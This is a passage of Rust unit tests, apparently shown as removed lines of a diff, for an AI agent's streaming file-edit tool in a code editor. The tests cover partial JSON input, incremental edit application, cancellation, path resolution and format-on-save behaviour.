} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit multiple lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - Edit { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit adjacent lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }, - Edit { - old_text: "line 3".into(), - new_text: "modified line 3".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "line 1\nmodified line 2\nmodified line 3\nline 4\nline 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - Edit { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "foo".into(), - new_text: "bar".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - assert_eq!(error, "Can't edit file: path not found"); - assert!(diff.is_empty()); - assert_eq!(input_path, None); - } - - 
#[gpui::test] - async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "nonexistent text that is not in the file".into(), - new_text: "replacement".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Could not find matching text"), - "Expected error containing 'Could not find matching text' but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); - - // Path is NOT yet complete because mode hasn't appeared — no buffer open yet - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Now send the final complete input - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": 
[{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send partial with path but NO mode — path should NOT be treated as complete - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file" - })); - cx.run_until_parked(); - - // Now the path grows and mode appears - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Send final - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new content" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new content"); - } - - #[gpui::test] - async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver, mut cancellation_tx) = - ToolCallEventStream::test_with_cancellation(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send a partial - sender.send_partial(json!({"display_description": "Edit"})); - cx.run_until_parked(); - - // Cancel during streaming - ToolCallEventStream::signal_cancellation_with_sender(&mut cancellation_tx); - cx.run_until_parked(); - - // The sender is still alive so the partial loop should detect cancellation - // We need to drop the sender to also unblock recv() if the loop didn't catch it - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { error, .. 
} = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("cancelled"), - "Expected cancellation error but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Simulate fine-grained streaming of the JSON - sender.send_partial(json!({"display_description": "Edit multiple"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 1"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "modified line 1"}, - {"old_text": "line 5"} - ] - })); - cx.run_until_parked(); - - // Send final complete input - sender.send_full(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "modified line 1"}, - {"old_text": "line 5", "new_text": "modified line 5"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Stream partials for create mode - sender.send_partial(json!({"display_description": "Create new file"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "Hello, " - })); - cx.run_until_parked(); - - // Final with full content - sender.send_full(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "Hello, World!" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "Hello, World!"); - } - - #[gpui::test] - async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send final immediately with no partials (simulates non-streaming path) - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_incremental_edit_application(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Stream description, path, mode - sender.send_partial(json!({"display_description": "Edit multiple lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // First edit starts streaming (old_text only, still in progress) - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 1"}] - })); - cx.run_until_parked(); - - // Buffer 
should not have changed yet — the first edit is still in progress - // (no second edit has appeared to prove the first is complete) - let buffer_text = project.update(cx, |project, cx| { - let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); - project_path.and_then(|pp| { - project - .get_open_buffer(&pp, cx) - .map(|buffer| buffer.read(cx).text()) - }) - }); - // Buffer is open (from streaming) but edit 1 is still in-progress - assert_eq!( - buffer_text.as_deref(), - Some("line 1\nline 2\nline 3\nline 4\nline 5\n"), - "Buffer should not be modified while first edit is still in progress" - ); - - // Second edit appears — this proves the first edit is complete, so it - // should be applied immediately during streaming - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED 1"}, - {"old_text": "line 5"} - ] - })); - cx.run_until_parked(); - - // First edit should now be applied to the buffer - let buffer_text = project.update(cx, |project, cx| { - let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); - project_path.and_then(|pp| { - project - .get_open_buffer(&pp, cx) - .map(|buffer| buffer.read(cx).text()) - }) - }); - assert_eq!( - buffer_text.as_deref(), - Some("MODIFIED 1\nline 2\nline 3\nline 4\nline 5\n"), - "First edit should be applied during streaming when second edit appears" - ); - - // Send final complete input - sender.send_full(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED 1"}, - {"old_text": "line 5", "new_text": "MODIFIED 5"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. 
- } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "MODIFIED 1\nline 2\nline 3\nline 4\nMODIFIED 5\n"); - assert_eq!( - *old_text, "line 1\nline 2\nline 3\nline 4\nline 5\n", - "old_text should reflect the original file content before any edits" - ); - } - - #[gpui::test] - async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup: description + path + mode - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 in progress - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "aaa", "new_text": "AAA"}] - })); - cx.run_until_parked(); - - // Edit 2 appears — edit 1 is now complete and should be applied - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"} - ] - })); - cx.run_until_parked(); - - // Verify edit 1 fully applied. Edit 2's new_text is being - // streamed: "CCC" is inserted but the old "ccc" isn't deleted - // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). 
- let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); - - // Edit 3 appears — edit 2 is now complete and should be applied - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"}, - {"old_text": "eee", "new_text": "EEE"} - ] - })); - cx.run_until_parked(); - - // Verify edits 1 and 2 fully applied. Edit 3's new_text is being - // streamed: "EEE" is inserted but old "eee" isn't deleted yet. - let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); - - // Send final - sender.send_full(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"}, - {"old_text": "eee", "new_text": "EEE"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "AAA\nbbb\nCCC\nddd\nEEE\n"); - } - - #[gpui::test] - async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 (valid) in progress — not yet complete (no second edit) - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"} - ] - })); - cx.run_until_parked(); - - // Edit 2 appears (will fail to match) — this makes edit 1 complete. - // Edit 1 should be applied. Edit 2 is still in-progress (last edit). - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"}, - {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"} - ] - })); - cx.run_until_parked(); - - let buffer = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).unwrap() - }); - - // Verify edit 1 was applied - let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); - assert_eq!( - buffer_text, "MODIFIED\nline 2\nline 3\n", - "First edit should be applied even though second edit will fail" - ); - - // Edit 3 appears — this makes edit 2 "complete", triggering its - // resolution which should fail (old_text doesn't exist in the file). 
- sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"}, - {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"}, - {"old_text": "line 3", "new_text": "MODIFIED 3"} - ] - })); - cx.run_until_parked(); - - // The error from edit 2 should have propagated out of the partial loop. - // Drop sender to unblock recv() if the loop didn't catch it. - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - - assert!( - error.contains("Could not find matching text for edit at index 1"), - "Expected error about edit 1 failing, got: {error}" - ); - // Ensure that first edit was applied successfully and that we saved the buffer - assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); - assert_eq!( - diff, - "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" - ); - } - - #[gpui::test] - async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup + single edit that stays in-progress (no second edit to prove completion) - sender.send_partial(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] - })); - cx.run_until_parked(); - - // The edit's old_text and new_text both arrived in one partial, so 
- // the old_text is resolved and new_text is being streamed via - // StreamingDiff. The buffer reflects the in-progress diff (new text - // inserted, old text not yet fully removed until finalization). - let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!( - buffer_text.as_deref(), - Some("goodbye worldhello world\n"), - "In-progress streaming diff: new text inserted, old text not yet removed" - ); - - // Send final — the edit is applied during finalization - sender.send_full(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "goodbye world\n"); - } - - #[gpui::test] - async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send progressively more complete partial snapshots, as the LLM would - sender.send_partial(json!({ - "display_description": "Edit lines" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - cx.run_until_parked(); - - 
// Send the final complete input - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world\n"})).await; - let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send a partial then drop the sender without sending final - sender.send_partial(json!({ - "display_description": "Edit file" - })); - cx.run_until_parked(); - - drop(sender); - - let result = task.await; - assert!( - result.is_err(), - "Tool should error when sender is dropped without sending final input" - ); - } - - #[gpui::test] - async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - // Create a channel and send multiple partials before a final, then use - // ToolInput::resolved-style immediate delivery to confirm recv() works - // when partials are already buffered. 
- let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Buffer several partials before sending the final - sender.send_partial(json!({"display_description": "Create"})); - sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); - sender.send_partial(json!({ - "display_description": "Create", - "path": "root/dir/new.txt", - "mode": "write" - })); - sender.send_full(json!({ - "display_description": "Create", - "path": "root/dir/new.txt", - "mode": "write", - "content": "streamed content" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "streamed content"); - } - - #[gpui::test] - async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = StreamingEditFileMode::Write; - - let result = test_resolve_path(&mode, "root/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); - - let result = test_resolve_path(&mode, "new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); - - let result = test_resolve_path(&mode, "dir/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); - - let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); - - let result = test_resolve_path(&mode, "root/dir/subdir", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't write to file: path is a directory" - ); - - let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't create file: parent directory doesn't exist" - ); - } - - #[gpui::test] - async fn test_streaming_resolve_path_for_editing_file(cx: 
&mut TestAppContext) { - let mode = StreamingEditFileMode::Edit; - - let path_with_root = "root/dir/subdir/existing.txt"; - let path_without_root = "dir/subdir/existing.txt"; - let result = test_resolve_path(&mode, path_with_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); - - let result = test_resolve_path(&mode, path_without_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); - - let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); - assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); - - let result = test_resolve_path(&mode, "root/dir", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't edit file: path is a directory" - ); - } - - async fn test_resolve_path( - mode: &StreamingEditFileMode, - path: &str, - cx: &mut TestAppContext, - ) -> Result { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "dir": { - "subdir": { - "existing.txt": "hello" - } - } - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - - cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) - } - - #[track_caller] - fn assert_resolved_path_eq(path: Result, expected: &RelPath) { - let actual = path.expect("Should return valid path").path; - assert_eq!(actual.as_ref(), expected); - } - - #[gpui::test] - async fn test_streaming_format_on_save(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"src": {}})).await; - let (tool, project, action_log, fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let rust_language = Arc::new(language::Language::new( - language::LanguageConfig { - name: "Rust".into(), - matcher: language::LanguageMatcher { - path_suffixes: vec!["rs".to_string()], - ..Default::default() - }, - ..Default::default() - }, - None, - )); - - let 
language_registry = project.read_with(cx, |project, _| project.languages().clone()); - language_registry.add(rust_language); - - let mut fake_language_servers = language_registry.register_fake_lsp( - "Rust", - language::FakeLspAdapter { - capabilities: lsp::ServerCapabilities { - document_formatting_provider: Some(lsp::OneOf::Left(true)), - ..Default::default() - }, - ..Default::default() - }, - ); - - fs.save( - path!("/root/src/main.rs").as_ref(), - &"initial content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - // Open the buffer to trigger LSP initialization - let buffer = project - .update(cx, |project, cx| { - project.open_local_buffer(path!("/root/src/main.rs"), cx) - }) - .await - .unwrap(); - - // Register the buffer with language servers - let _handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ -"; - const FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ -"; - - // Get the fake language server and set up formatting handler - let fake_language_server = fake_language_servers.next().await.unwrap(); - fake_language_server.set_request_handler::({ - |_, _| async move { - Ok(Some(vec![lsp::TextEdit { - range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(1, 0)), - new_text: FORMATTED_CONTENT.to_string(), - }])) - } - }); - - // Test with format_on_save enabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings.project.all_languages.defaults.format_on_save = Some(FormatOnSave::On); - settings.project.all_languages.defaults.formatter = - Some(language::language_settings::FormatterList::default()); - }); - }); - }); - - // Use streaming pattern so executor can pump the LSP request/response - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = 
ToolCallEventStream::test(); - - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Create main function", - "path": "root/src/main.rs", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Create main function", - "path": "root/src/main.rs", - "mode": "write", - "content": UNFORMATTED_CONTENT - })); - - let result = task.await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - new_content.replace("\r\n", "\n"), - FORMATTED_CONTENT, - "Code should be formatted when format_on_save is enabled" - ); - - let stale_buffer_count = thread - .read_with(cx, |thread, _cx| thread.action_log.clone()) - .read_with(cx, |log, cx| log.stale_buffers(cx).count()); - - assert_eq!( - stale_buffer_count, 0, - "BUG: Buffer is incorrectly marked as stale after format-on-save. 
Found {} stale buffers.", - stale_buffer_count - ); - - // Test with format_on_save disabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings.project.all_languages.defaults.format_on_save = - Some(FormatOnSave::Off); - }); - }); - }); - - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool2 = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - - let task = cx.update(|cx| tool2.run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Update main function", - "path": "root/src/main.rs", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Update main function", - "path": "root/src/main.rs", - "mode": "write", - "content": UNFORMATTED_CONTENT - })); - - let result = task.await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - new_content.replace("\r\n", "\n"), - UNFORMATTED_CONTENT, - "Code should not be formatted when format_on_save is disabled" - ); - } - - #[gpui::test] - async fn test_streaming_remove_trailing_whitespace(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"src": {}})).await; - fs.save( - path!("/root/src/main.rs").as_ref(), - &"initial content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - let (tool, project, 